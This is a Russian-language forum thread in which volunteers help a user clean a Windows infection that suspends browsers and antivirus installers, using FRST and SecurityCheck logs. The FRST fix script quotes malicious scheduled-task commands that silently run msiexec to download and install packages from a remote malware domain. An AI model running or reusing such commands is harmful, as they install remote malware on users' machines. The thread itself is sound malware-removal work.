1 / 1 / 0
Регистрация: 03.04.2016
Сообщений: 9
|
|
1 | |
Вирус блокирует процесс установки антивируса, процесс браузера при попытке скачать антивирус02.04.2019, 20:31. Показов 3261. Ответов 17
Метки нет (Все метки)
При попытке загуглить любой известный антивирус или перейти на его сайт напрямую процесс браузера останавливается (переходит в состояние Suspended в диспетчере задач). То же самое происходит с процессами-установщиками антивирусов и с avz, который используется в сборщике логов. Периодически (раз в ~20 мин) в браузере открывается новая вкладка со случайным рекламным сайтом.
Проблема очень похожа на этот случай: Вирус не дает установить антивирус. Браузер зависает при любом напоминании об антивирусе Аналогично ему, запустил утилиты для сбора логов отдельно.
0
|
02.04.2019, 20:31 | |
Ответы с готовыми решениями:
17
Вирус блокирует установку антивируса и браузер при поиске антивируса Вирус поменял ярлыки браузера, в диспетчере задач неубиваемый процесс с иероглифами При включении браузера антивирус блокирует какой-то сайт При включении браузера антивирус блокирует какой-то сайт |
21874 / 15677 / 3023
Регистрация: 08.10.2012
Сообщений: 63,736
|
|
03.04.2019, 10:29 | 2 |
0
|
1 / 1 / 0
Регистрация: 03.04.2016
Сообщений: 9
|
|
03.04.2019, 20:51 [ТС] | 3 |
Здравствуйте. Эта версия автологгера тоже блочится на этапе работы скрипта AVZ (скриншот приложил). Разблокировать процесс через монитор ресуров не получается.
0
|
3877 / 2093 / 342
Регистрация: 04.04.2012
Сообщений: 7,702
|
|
03.04.2019, 21:04 | 4 |
Подготовьте логи FRST: https://www.cyberforum.ru/post7151340.html
0
|
1 / 1 / 0
Регистрация: 03.04.2016
Сообщений: 9
|
|
03.04.2019, 21:22 [ТС] | 5 |
При переходе по указанной ссылке браузер блокируется (видимо, из-за названия вкладки). Удалось просмотреть страницу через Postman и скачать экзешник frst, но процесс frst также блокируется при запуске.
0
|
3877 / 2093 / 342
Регистрация: 04.04.2012
Сообщений: 7,702
|
|
03.04.2019, 21:26 | 6 |
Пока не перешли к тяжелому вооружению, попробуем еще вот этот лог: https://www.cyberforum.ru/post6501803.html
0
|
1 / 1 / 0
Регистрация: 03.04.2016
Сообщений: 9
|
|
03.04.2019, 21:46 [ТС] | 7 |
По вкладке браузера та же история, что с fsrt. Процессы WinRAR и даже Проводника при попытке открыть uvs.zip тоже замёрзли. Можно попытаться скачать сразу экзешник, но боюсь, выйдет то же самое.
Я также могу проделать эти манипуляции в безопасном режиме или ещё раз снять логи HJT, если нужно.
0
|
3877 / 2093 / 342
Регистрация: 04.04.2012
Сообщений: 7,702
|
|
03.04.2019, 22:05 | 8 |
Давайте FRST из безопасного режима
0
|
1 / 1 / 0
Регистрация: 03.04.2016
Сообщений: 9
|
|
03.04.2019, 22:14 [ТС] | 9 |
Результат работы FRST из безопасного режима с сетью
0
|
3877 / 2093 / 342
Регистрация: 04.04.2012
Сообщений: 7,702
|
|
03.04.2019, 22:28 | 10 |
Сообщение было отмечено Carolus как решение
Решение
Отключите до перезагрузки антивирус.
Выделите следующий код: Код
Start:: CreateRestorePoint: ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions GroupPolicy: Restriction ? <==== ATTENTION Handler: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} - No File CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1801869206-1969270181-3000357203-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1801869206-1969270181-3000357203-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx S3 cpuz138; C:\Users\Carolus\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [27320 2019-02-15] (CPUID -> CPUID) <==== ATTENTION U3 idsvc; no ImagePath 2019-03-28 08:46 - 2019-03-28 08:46 - 000003700 _____ C:\WINDOWS\System32\Tasks\{1D7F1D2C-E0C7-9BCA-B743-014CE1AD64C7} 2019-03-28 08:46 - 2019-03-28 08:46 - 000003498 _____ C:\WINDOWS\System32\Tasks\{4D9A062F-6F97-4742-F676-6AA753F0CD53} CustomCLSID: HKU\S-1-5-21-1801869206-1969270181-3000357203-1000_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> C:\Program Files\Common Files\Autodesk Shared\DirectConnect2016 (64-bit)\bin\Aruba\Inventor Server\Bin\TestServer.dll => No File CustomCLSID: HKU\S-1-5-21-1801869206-1969270181-3000357203-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Common Files\Autodesk Shared\DirectConnect2016 (64-bit)\bin\Aruba\Inventor Server\Bin\TestServer.dll => No File CustomCLSID: HKU\S-1-5-21-1801869206-1969270181-3000357203-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Common Files\Autodesk Shared\DirectConnect2016 (64-bit)\bin\Aruba\Inventor Server\Bin\TestServer.dll => No File Task: {272C8265-F89A-44DF-AD6B-CEA13BC36C0E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION Task: {2F14722B-3E06-495F-A25B-051DB98DFEFF} - System32\Tasks\{1D7F1D2C-E0C7-9BCA-B743-014CE1AD64C7} => "msiexec" /q /package hxxps://siamoderg.info/weub/ofiuzoguq.ecz <==== ATTENTION Task: {33157B91-3D51-44E7-9305-448DA944CC1B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {36381B85-71BA-42DE-B1FD-BF77F391507C} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {477A782F-6665-4903-925C-EA780C3BCBB3} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION Task: {5629366C-469A-4CAF-A887-8F8926F55ACB} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {592DF82D-F21B-4870-9FED-6F4F024606E1} - System32\Tasks\Origin => C:\Users\Carolus\AppData\Roaming\Origin\update.vbe <==== ATTENTION Task: {5A66D23E-6D00-4E7F-9BB0-AE2BFFECEE0F} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION Task: {77572012-1A8C-4BB8-9564-3E0008D9BEC2} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION Task: {7C6A3772-E888-4897-B5A1-63A196785013} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION Task: {94F61A7C-3A03-46AD-844D-0E1C92117C8E} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION Task: {AFA9AF89-7D76-4225-86BE-2EE83C0F9695} - System32\Tasks\{4D9A062F-6F97-4742-F676-6AA753F0CD53} => "msiexec" -package hxxps://siamoderg.info/iboeefv/plnoe.onr -q <==== ATTENTION Task: {C1D2E180-9837-4419-8AAB-B1A26AC56D9B} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION Task: {D71CA5E5-9149-4E1F-AED7-D3413A36B816} - no filepath Task: {DABA951D-6038-4211-8550-E7698F8F9105} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION Task: {EE56682E-3541-4EC4-9ACD-6B14CBCA58E0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION Task: {FDA599C1-9279-4889-BD4A-ADD595473782} - System32\Tasks\GoogleCheckService => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://aqua1man.net <==== ATTENTION WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name="BVTConsumer"",Filter="__EventFilter.Name="BVTFilter":: WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99] WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate] AlternateDataStreams: C:\ProgramData\TEMP:4FC01C57 [134] CMD: "%ProgramFiles%\\Windows Defender\\MpCmdRun.exe" -Scan -ScanType 1 CMD: ipconfig /flushdns CMD: wmic qfe list EmptyTemp: Reboot: End:: Запустите FRST (FRST64) от имени администратора. Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически.
0
|
1 / 1 / 0
Регистрация: 03.04.2016
Сообщений: 9
|
|
04.04.2019, 07:06 [ТС] | 11 |
После перезагрузки проблема с приостановкой процессов разрешилась, скачал антивирус и запустил сканирование.
Могу запустить Автологер/FSRT уже в обычном режиме Windows, если требуется.
0
|
21874 / 15677 / 3023
Регистрация: 08.10.2012
Сообщений: 63,736
|
|
04.04.2019, 09:14 | 12 |
Да, Автологер запустите в нормальном режиме и покажите CollectionLog.
1
|
1 / 1 / 0
Регистрация: 03.04.2016
Сообщений: 9
|
|
04.04.2019, 18:16 [ТС] | 13 |
Антивирус при полной проверке обнаружил несколько угроз и удалил их перед тем, как были сняты логи. На время снятия логов антивирус отключал.
0
|
3877 / 2093 / 342
Регистрация: 04.04.2012
Сообщений: 7,702
|
|
04.04.2019, 18:34 | 14 |
Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
+ Подготовьте лог SecurityCheck by glax24: https://safezone.cc/resources/... 5/download
0
|
1 / 1 / 0
Регистрация: 03.04.2016
Сообщений: 9
|
|
04.04.2019, 19:59 [ТС] | 15 |
2 - пункт Обновление баз был недоступен
4 - логи AVZ по ссылке: https://my-files.ru/cpz2gs SecurityCheck by glax24 & Severnyj v.1.4.0.53 [27.10.17] WebSite: www.safezone.cc DateLog: 04.04.2019 21:52:48 Path starting: C:\Users\Carolus\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe Log directory: C:\SecurityCheck\ IsAdmin: True User: Carolus VersionXML: 6.18is-31.03.2019 ___________________________________________________________________________ Windows 10(6.3.17134) (x64) Professional Release: 1803 Lang: English(0409) Installation date OS: 20.05.2018 17:57:35 LicenseStatus: Windows(R), Professional edition The machine is permanently activated. LicenseStatus: Office 16, Office16ProPlusVL_KMS_Client edition Windows is in Notification mode Boot Mode: Normal Default Browser: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe SystemDrive: C: FS: [NTFS] Capacity: [110.9 Gb] Used: [102.4 Gb] Free: [8.5 Gb] ------------------------------- [ Windows ] ------------------------------- Internet Explorer 11.648.17134.0 User Account Control enabled (Level 3) Automatically download and schedule installation Windows Update (wuauserv) - The service has stopped Security Center (wscsvc) - The service is running Remote Registry (RemoteRegistry) - The service has stopped SSDP Discovery (SSDPSRV) - The service is running Remote Desktop Services (TermService) - The service is running World Wide Web Publishing Service (W3SVC) - The service has stopped Windows Remote Management (WS-Management) (WinRM) - The service has stopped System Restore Disable ------------------------------ [ MS Office ] ------------------------------ Microsoft Office 2016 x86 v.16.0.4266.1001 ---------------------------- [ Antivirus_WMI ] ---------------------------- Windows Defender (enabled and up to date) Kaspersky Anti-Virus (disabled and up to date) --------------------------- [ FirewallWindows ] --------------------------- Windows Defender Firewall (mpssvc) - The service is running --------------------------- [ AntiSpyware_WMI ] --------------------------- Kaspersky Anti-Virus (disabled and up to date) Windows Defender (enabled and up to date) ---------------------- [ AntiVirusFirewallInstall ] ----------------------- Kaspersky Anti-Virus v.19.0.0.1088 --------------------------- [ OtherUtilities ] ---------------------------- 7-Zip 18.05 (x64) v.18.05 Warning! Download Update Uninstall old version and install new one. Git version 2.7.0.2 v.2.7.0.2 Warning! Download Update WinRAR 5.30 beta 3 (64-bit) v.5.30.3 Warning! Download Update Microsoft .NET Framework 4.5.2 v.4.5.51209 Warning! Download Update Node.js v.6.11.0 Warning! Download Update Microsoft Silverlight v.5.1.50907.0 Warning! Download Update NVIDIA GeForce Experience 3.18.0.94 v.3.18.0.94 K-Lite Codec Pack 11.4.0 Standard v.11.4.0 Warning! Download Update Steam v.2.10.91.91 TeamViewer 12 v.12.0.83369 Warning! Download Update TeamViewer 12 (TeamViewer) - The service is running --------------------------------- [ IM ] ---------------------------------- Discord v.0.0.305 Telegram Desktop version 1.6.3 v.1.6.3 ---------------------------- [ ProxyAndVPNs ] ----------------------------- Kaspersky Secure Connection v.19.0.0.1088 --------------------------------- [ P2P ] --------------------------------- eMule 1.0.1.4 v.1.0.1.4 Warning! P2P-client. µTorrent v.3.5.3.44358 Warning! P2P-client. -------------------------------- [ Java ] --------------------------------- Java 8 Update 171 (64-bit) v.8.0.1710.11 Warning! Download Update Uninstall old version and install new one (jre-8u201-windows-x64.exe). Java 8 Update 201 (64-bit) v.8.0.2010.9 Java SE Development Kit 8 Update 131 (64-bit) v.8.0.1310.11 Warning! Download Update Uninstall old version and install new one (jdk-8u201-windows-x64.exe). --------------------------- [ AdobeProduction ] --------------------------- Adobe Flash Player 32 NPAPI v.32.0.0.156 Adobe Flash Player 32 PPAPI v.32.0.0.156 Adobe Acrobat Reader DC - Russian v.18.011.20036 Warning! Download Update ^Please run Acrobat Reader DC and go Help - Check for updates...^ ------------------------------- [ Browser ] ------------------------------- Google Chrome v.73.0.3683.86 Mozilla Firefox 66.0.2 (x86 ru) v.66.0.2 ------------------ [ AntivirusFirewallProcessServices ] ------------------- Kaspersky Anti-Virus Service 19.0.0 (AVP19.0.0) - The service is running C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 19.0.0\avp.exe v.19.0.0.1088 C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 19.0.0\avpui.exe v.19.0.0.1088 C:\Program Files (x86)\Kaspersky Lab\Kaspersky Secure Connection 3.0\ksde.exe v.19.0.0.1088 C:\Program Files (x86)\Kaspersky Lab\Kaspersky Secure Connection 3.0\ksdeui.exe v.19.0.0.1088 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1903.3-0\MsMpEng.exe v.4.18.1903.3 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1903.3-0\NisSrv.exe v.4.18.1903.3 C:\Program Files\Windows Defender\MSASCuiL.exe v.4.13.17134.1 Windows Defender Antivirus Service (WinDefend) - The service is running Windows Defender Antivirus Network Inspection Service (WdNisSvc) - The service is running ---------------------------- [ UnwantedApps ] ----------------------------- FileSearchy v.1.42 Warning! Suspected Adware! If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware and Malwarebytes AdwCleaner. Before uninstallation and scanning it is necessary to consult in the forum where cure is provided for you!!! UmmyVideoDownloader v.1.8.3.2 Warning! Suspected Adware! If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware and Malwarebytes AdwCleaner. Before uninstallation and scanning it is necessary to consult in the forum where cure is provided for you!!! ----------------------------- [ End of Log ] ------------------------------
0
|
3877 / 2093 / 342
Регистрация: 04.04.2012
Сообщений: 7,702
|
|
04.04.2019, 20:27 | 16 |
Обновляйте программы по ссылкам и читайте: Рекомендации после удаления вредоносного ПО
Если в списке подозрительных неизвестные вам - деинсталлируйте
1
|
1 / 1 / 0
Регистрация: 03.04.2016
Сообщений: 9
|
|
04.04.2019, 20:29 [ТС] | 17 |
severnyj, Sandor, спасибо за помощь!
1
|
3877 / 2093 / 342
Регистрация: 04.04.2012
Сообщений: 7,702
|
|
04.04.2019, 20:32 | 18 |
Удачи
0
|
04.04.2019, 20:32 | |
04.04.2019, 20:32 | |
Помогаю со студенческими работами здесь
18
Процесс svchost.exe (netsvcs) грузит оперативку при обновлении антивируса При открытии браузеров (Chrome, Mozilla) антивирус блокирует переход на ссылку (вирус) Антивирус блокирует "переход по вредоносной ссылке" при попытке открытия документов и таблиц гугл Как завершить процесс антивируса? Искать еще темы с ответами Или воспользуйтесь поиском по форуму: |